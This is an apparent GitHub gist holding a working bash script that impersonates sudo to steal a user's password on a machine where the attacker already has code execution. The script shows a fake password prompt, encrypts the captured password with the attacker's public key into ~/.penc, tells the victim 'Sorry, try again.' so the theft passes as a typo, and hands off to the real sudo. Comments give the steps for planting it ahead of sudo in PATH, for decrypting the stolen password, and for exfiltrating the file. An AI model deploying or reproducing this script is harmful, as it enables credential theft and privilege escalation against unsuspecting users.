Skip to content

Instantly share code, notes, and snippets.

@YSaxon
Last active September 8, 2022 14:11
Show Gist options
  • Save YSaxon/79ef0243bc7082fdcb4172bc3272cc52 to your computer and use it in GitHub Desktop.
Save YSaxon/79ef0243bc7082fdcb4172bc3272cc52 to your computer and use it in GitHub Desktop.
bash sudo spoofer, to obtain a users password if you have RCE but need their password to sudo
#step 1: generate an rsa public/private keypair, and write your public key into the script below
#step 2: put this script onto the computer you are attacking, make it executable, and ensure it has higher PATH priority than real sudo
#step 3: after you obtain the encrypted password, decrypt it with cat .penc | openssl rsautl -decrypt -inkey your_key.priv
#note that you could easily modify to spoof other password taking utils like sudosh or su
sudo=`which -a sudo | head -n 2 | tail -n 1` #you could also just edit this to put in the location of real sudo yourself
if [ -s ~/.penc ] #the script has already ran
then
$sudo "$@" #just forward it straight to real sudo
else
read -p "[sudo] password for $(whoami): " -s p #you might need to modify the prompt based on the sudo platform
#replace this with your public key, or you won't be able to decrypt it!!
cat << EOF > ~/.penc
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1LMw8fHhxweSLGhw+n+3
t57lEDScuVFnkiqOxsM1hhHX1Q+Vz4c8EBQkCexsz52Z7WaJYr8UgrnlDjh1QYio
yOzmlu1jjPWOX44faOcvtYzF426Bqotxst90oHe9B1nWzodEtrALi2NDdAoi8I9y
koYPBjxbxn21/XYHQ/9EhqHgO/AQoNgdjji3J874w/8P50XFO/DBJe6rRSpy67Os
HnipEZo+Wb212jTCoI63MoVkjhaa9BzPIHFi/QxKznyILyKjxghAbJibvFF6DXn3
fMO8tCn1NcxP1pZucEJE0JbsDb4zGa3x7X1il1gZQiQwm/UJLwOzmTDiwyIAMncU
JQIDAQAB
-----END PUBLIC KEY-----
EOF
echo $p | openssl rsautl -encrypt -inkey ~/.penc -pubin -out ~/.penc; unset p #encrypt the password with your public key
#this would be a good place to try to exfiltrate the ~/.penc file, otherwise, just come back and look for it later
#as an alternative over here, if the sudo on your platform supports it, consider echo $p | sudo -S "$@"
echo; echo 'Sorry, try again.' && $sudo "$@" #tell them they got it wrong, and they'll assume it's just a typo, then forward them to real sudo
#alternatively, depending on your platform, you could try forwarding the actual password directly to sudo, but not every sudo will take that
fi
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment